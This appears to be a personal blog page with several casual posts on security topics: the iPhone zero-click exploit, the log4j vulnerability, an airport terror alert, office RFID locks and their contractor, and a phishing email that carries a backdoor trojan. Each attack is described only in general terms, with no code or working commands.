Symbolic Forest

Following on from yesterday’s post about log4j: another security article fascinated me in the last week, too. You might have already seen it, because it was widely shared on Twitter and computer people everywhere were amazed and aghast at its engineering and its possibilities. The log4j vulnerability is a relatively pedestrian one by comparison, using something that is an entirely documented and public feature of the library. This, on the other hand, is a completely different animal.

It’s a hack which lets you run code on a stranger’s iPhone just by sending them a message. They don’t have to click on anything, they don’t even have to open it, all their phone has to do is receive it and the hacker can take their phone over. At least, could: the fix for this security hole was fixed three months ago in iOS 14.8 and later. If you are running an older version of iOS on your phone or tablet, then, er, maybe don’t. The analysis of how this hack works, by Google Project Zero, has started to be published; and if you’re a programming nerd, it is beautiful and amazing and horrific in just the same way that a biological virus is.

In short, this hack relied on the fact that an iOS device, when it receives an animated GIF, tries to hack the GIF a little so it will always loop forever whatever the GIF itself actually says to do. It does this in an unhealthy way, though. When it opens the file to change it, it doesn’t matter if it’s not actually a GIF. The software will try to be clever and say “ah, looks like your file’s got the wrong name there, don’t worry, I still know how to open one of these” and do it. Even if it’s not a GIF and therefore doesn’t really need to.

Secondly, the hack relies on a bug in an open source PDF-reading library, in the part of the code used to open embedded images that are in an obscure and rather out-of-date format mostly used by fax machines. PDF is a big, complex and rambly format (believe me I know, I’ve been on-off trying to write a .NET PDF writing library for some years now) so it’s not surprising there are bugs and holes in PDF-reading software. What this hack does, though, is frankly brilliant. It uses the capabilities of the compression algorithm of this particular graphics format to implement an entire virtual CPU in the memory of the target device. It’s a small CPU but it is a Turing-complete one, which in technical terms mean that if you ignore practical limits of time and memory, it’s just as powerful as any other computer. An entire virtual CPU…created by feeding a carefully-designed image into a buggy image decompression routine.^*

Frankly, if you’re a software developer, this is genius. Evil genius, to be sure, but genius nonetheless. I’m somewhat in awe of it, in a dirty way. It’s a wonderful level of lateral thinking, to know that the bug is there to exploit and work out a way to reach it and trip it up to begin with; and then to build an entire virtual machine from the basic Boolean logic operations available inside a particular image format. As I said above, it’s beautiful, it’s amazing, and it’s horrific in the original sense of the word. It’s awe-inspiring. I might be good at my job, but I can only look upon this with amazement and envy.

* I assume the image itself looks like just so much white noise if you could actually view it, but you can’t have everything. It reminds me a little of Neal Stephenson’s early-90s novel Snow Crash, in which a carefully-designed image that looks like white noise can hack the viewer’s brain.

Keyword noise: programming, software, security, hackers.

In many ways I lead a charmed life and hold a wide range of privileges in my hand. Not least, this week just gone, the fact that I’m a software developer who generally works with the .NET software stack. More specifically, I am not a software developer who works with Java. Java developers have not, generally speaking, been having a good week.

This is all because of a software vulnerability discovered just over a week ago in a Java library called “log4j”. To summarise, for non-experts: “log4j” is a logging library. No, not the let’s-clear-the-rainforests sort. “Logging” means your software writing diagnostic information as it goes along: records such as “user etoainshrdlu asked to see their bank balance at 9.10am from this address with that web browser”. You can see why…

Regular reader E Shrdlu (from Clacton) writes: Oi! You can’t go around giving my bank balance to people!

Hush now, I was just using you as an example! You can see why it’s useful to have this information stored away somewhere, and log4j is a software library that makes it really easy to do. Virtually all Java server-side code out there uses log4j somewhere inside it, to handle this sort of thing.

Unfortunately, log4j has a few handy features that were originally intended to be useful features, but aren’t necessarily a good idea to have running on an internet-facing server that does important work such as process your banking requests. Particularly, in this case, if you put a certain specialist type of URL into a log record, log4j will see it, try to download another program from it, and will then run that program in a certain well-defined way. Of course, you might say, there’s nothing wrong with that because all of the log record messages are just written by the bank’s own software developers, so everything’s perfectly safe. However, as I said above, one thing they may very well be logging is which browser you happen to be using, because that’s very useful diagnostic data if people start having problems. “Which browser you happen to be using”, though, is just a field that you send them, and if you know what you’re doing, you can change it to whatever you want to. Including a special type of URL which will…well, hopefully you get the picture. And now you’re running whatever programs you like on one of your bank’s internal servers. Ah. You can see now why Java developers have not been having a good week.

The fix for this is straightforward, but rolling the fix out will have involved a huge proportion of the Java code running in the world being checked, double-checked, and redeployed when it’s known to be safe. Moreover, all of the developers doing this will have had several queries a day from their managers asking just how much they are exposed to this issue. I know: I’ve had several myself, even though my response is straightforwardly “we don’t run any Java code at all, so don’t worry.” I do tell them to tell the clients we have thoroughly and conscientiously audited our systems because from a client-relations point of view it does sound a bit more professional than “no, and our tech lead is very glad of her career choices”. But it still means plenty of messages for me to answer.

Incidentally, I don’t feel any sort of schadenfreude about this, in case you were wondering. I genuinely feel sorry for a lot of people I know, who will not have had a good week fixing this stuff. I’ve worked in big banks and other similar organisations, and I know a lot of former colleagues and current friends who will have spent the last week focusing on this above all else. It’s not nice when you are suddenly bowled by a risk like this; and moreover, it’s not as if Java is uniquely likely to suffer from this type of problem. There are nuances to this that I may come back to in a later post; but next time something like this happens, the person fixing it might well be me.

Keyword noise: programming, software, security, hackers, E Shrdlu.

Well, I’m glad I’m not going anywhere today. Not just in a plane, but anywhere that might involve driving past an airport, because no doubt the traffic around them will be awful too.

Today demonstrates the horror of 24-hour news. I’m just as bad as everyone else, refreshing the BBC News site every five minutes to get the latest on the Terror Alert. The news reports, meanwhile, are filled with hyperbolic phrases such as “mass murder on an unimaginable scale”.^* No it isn’t. People have imagined it. To quote The Princess Bride, “I do not think you know what that word means.”

The government seems to be stuck between a rock and a hard place, when it comes to statements. “We have arrested everyone involved, apart from the ones we haven’t”. “This is nothing to do with race, but we’re talking to Community Leaders about it.” How do you become a Community Leader, anyway? Are there elections?

No doubt bottled liquids will be confiscated on planes for the next few months, before everything goes back to normal, and the next terrorist attack comes along with something completely different. The ones that get through are never the ones you expect, after all.

* To be fair to the media, it was a police spokesman who came up with that exact phrase.

Keyword noise: airport, security, false alarms, flying, terrorism, travel.

Via Boing Boing, I’ve discovered a Wired article on RFID hacking, and how it can be used practically for breaking and entering. I can virtually see your eyes glazing over already: but, see, this is important to me at least. The security technologies described in the article are suspiciously like the ones which have recently been installed in the office at great expense.

Now, it is possible that our security consultant has installed the extra-secure encrypted systems described in the article, that are much harder to break into. Given that I’ve had to work with him, though, I’d be surprised if he even realised the difference between the two. I really must show this to Big Dave, and see if we can get our hands on the RFID-reading kit described, if only because it will really irritate Security Man.

Keyword noise: locks, RFID, security, technology.

So, as I explained yesterday, the security contractor at the office has saddled us with three “incompatible” security systems, two of which probably are compatible after all, it’s just that he doesn’t know how to get them to work together. We complained to the office manager about it. “Well, if that’s what the contractor said, that’s what’s going to happen.”

The next day, our boss comes through to visit. “What’s this about us needing three different tags for the alarms?”

We told him what we’d been told.

“It’s a bloody stupid idea. I thought they were all going to work together.” Yes, so did we. “I don’t want to have to carry three tags on my keyring.” And he wanders off, grumbling about it.

The following day, we notice the Managing Director stalking about in our part of the building, looking at the security gadgets and making “hmmm…” noises. The office manager is following him around, trying to explain how wonderful these expensive systems we’ve commissioned are.

“…you’ll have one tag for these doors, one tag for the outside doors and gates, one tag for…”

“Why do we need three different tags for everything? Why can’t we just have one?”

“The contractor says that they won’t…”

“Well, I thought we were just going to have one tag that would do everything. I don’t want…”

I tuned out, but it was clear the way the conversation was going. What makes me sigh isn’t that we always prefer contractors who have worked for us before, even when their track record is hardly promising.^* It’s that the management should have spotted this coming. The contractor did give the office manager a nice thick specifications document – did the manager bother to read it at all? Didn’t he bother to ask questions about the vague parts?

* This isn’t the first time the security contractor has fitted something and then not set it up properly, because although he’s agreed to fit the system we wanted he’s not willing to learn how to configure it.

Keyword noise: alarm, contractors, incompatibility, management, office, RFID, security.

As part of all the building work that’s been going on at the office, we’ve been getting the security systems upgraded. A new alarm system, new motorised front gates,^* and new electronic locks on most of the internal doors. All to be worked by RFID tags, kept on our keyrings and carried round all the time.

Now, being logical and sensible, we assumed that the company had specified either a single system, or compatible systems, so that we could use one single tag to unlock everything. Therefore we were pleased to spot, as the contractor^** started to install the hardware, that all the sensors we could see came from the same manufacturer. Very sensible.

We each get a tag the other week, and start using it to open and shut the front gates. Three days ago, the contractor pops his head round the door to say he’ll be issuing us with the rest of the tags, the ones for the indoor locks, soon.

“The rest of the tags? We’ve already got one.”

Apparently, we need separate ones for the outdoor locks, the indoor locks, and the alarm system itself. Because “the systems are from different manufacturers.”

“But they’re not from the same manufacturers! We’ve seen them, and they’re identical! If you hold an outdoor tag up to an indoor sensor, it recognises it!”

“No it doesn’t.”

I held my “outdoor tag” up to the newly-installed sensor by the office door. It bleeped, and flashed a little green light at me.

“Well, I can try to set it up so that that tag unlocks this door,” the contractor said. “But it won’t work.”

(to be continued, otherwise this post would get a bit long)

* This is a Good Thing, because guess who’s job it is to unlock and open the old front gates every morning.

** Our usual security contractor, a friendly chap, who is very anal about making sure his cabling is put in and terminated neatly, but isn’t very good at setting up the security systems themselves properly.

Keyword noise: alarm, building security, buildings, compatibility, defeatism, electronic locks, forward planning, incompatibility, locks, planning, RFID, RFID locks, security, systems.

Quite a few people, recently, have come to this site looking for information on Aramiska, the European satellite ISP which apparently collapsed last week. Sadly, there doesn’t seem to be any information, anywhere. The company promised to release a statement on January 30^th; it never appeared. Their disappearance is still a mystery.

Moving on, this email came in to one of our work addresses yesterday:

I noticed whilst browsing your site that there were problems with some of your links, when I tried again with Internet Explorer the problems were not there so I assume that they were caused by me using the Mozilla browser.

Very nice and helpful, you might think.^* However, if you read on, you might get a little more suspicious…

I have enclosed a screen capture of the problem so your team can get it fixed if you deem it an issue.

Hah. If you’re not suspicious yet, you probably shouldn’t be allowed near the internet. If you look a little closer, the attachment is a .scr file – which could, I suppose, look like “screenshot” to the non-technical. If you try to open it,^** then: congratulations, you have a virus, one known as W32/Brepibot. It’s a “backdoor”, a tool that then enables hackers to connect into your computer and harness it for their own nefarious purposes. Well done.

* As our work website was designed by an apparently-clueless PR chap with no previous knowledge of website design at all, it is also entirely believable.

** and you’re using a Windows computer, and don’t have up-to-date virus protection

Keyword noise: Aramiska, Brepibot, broadband, internet, ISP, out of business, satellite, satellite broadband, security, service, trojan, backdoor, vanishing, virus.